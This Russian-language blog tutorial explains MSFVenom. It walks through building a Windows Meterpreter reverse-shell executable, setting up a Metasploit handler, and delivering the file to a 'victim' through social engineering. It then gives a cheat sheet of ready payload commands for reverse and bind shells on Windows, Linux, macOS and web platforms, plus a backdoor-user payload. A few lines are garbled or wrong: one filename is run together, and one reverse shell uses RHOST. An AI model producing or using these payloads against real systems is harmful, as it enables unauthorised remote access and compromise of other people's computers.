В сегодняшней статье я покажу, как использовать MSFVenom. Вы узнаете, как создать полезную нагрузку (Payload) в MSFVenom. Также, приведу список всех команд MSFVenom.
Еще по теме: Как использовать фреймворк Metasploit
Что такое MSFVenom
MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.
В далеком 2015 году он заменил инструменты MSFPayload и MSFEncode.
В новой версии MSFVenom появилась справка. Чтобы отобразить справку введите:
|
1 |
msfvenom -h |
Как использовать MSFVenom
Reverse TCP (обратное подключение, обратный шелл, пейлоад), — схема взаимодействия с целевым компьютером. Говоря простым языком. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или в нашем случае обратный шелл, потому что «бэкконнект» — это понятие растяжимое.
Чтобы узнать, какие полезные нагрузки доступны введите команду:
|
1 |
msf5> msfvenom -l payloads |
Или так:
|
1 |
# msfvenom -l payloads |
Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.
- LHOST — IP-адрес вашего компьютера (атакующего).
- LPORT — порт вашего компьютера, который назначен серверу или программе.
- P — сокращение от «payload», полезная нагрузка для выбранной платформы.
- F — параметр, который задает тип файла, например, exe для Windows.
|
1 |
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infoecaddicts.exe |
Полезная нагрузка готова:
Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:
|
1 2 3 4 5 |
msf> use exploit/multi/handler msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf> set LHOST 192.168.1.13 msf> set LPORT 4444 msf> run |
Необходимо ввести те же данные (IP-адрес и порт), которые были использованы при создании обратного шелла.
Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.
После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.
После запуска созданного файла откроется сессия Meterpreter:

Поздравляю, вы получили доступ к компьютеру.
Команды MSFVenom
При использовании MSFVenom всегда должна быть под рукой шпаргалка по командам:
Meterpreter reverse shell x86 multi stage
|
1 |
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinux |
Linux Meterpreter bind shell x86 multi stage
|
1 |
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf |
Linux bind shell x64 single stage
|
1 |
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf |
Linux reverse shell x64 single stage
|
1 |
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf |
Windows Meterpreter reverse shell
|
1 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe |
Windows Meterpreter bind shell
|
1 |
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe |
Windows CMD Multi Stage
|
1 |
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe |
Windows CMD Single Stage
|
1 |
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe |
Windows add user
|
1 |
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe |
Mac Reverse Shell
|
1 |
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho |
Mac Bind shell
|
1 |
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho |
Python Shell
|
1 |
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py |
BASH Shell
|
1 |
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh |
PERL Shell
|
1 |
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl |
ASP Meterpreter shell
|
1 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp |
JSP Shell
|
1 |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp |
WAR Shell
|
1 |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war |
PHP Reverse Shell
|
1 |
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php |
Мы создали полезную нагрузку для Windows, но мы можем создать пейлоад для любой другой операционной системы, например: Android, iOS, Liniux и т. д. Все это позволяет сделать MSFVenom.
На этом все. Теперь вы знаете, как использовать MSFVenom.
Еще по теме: Анонимность в Kali Linux с помощью Tor и Proxychains









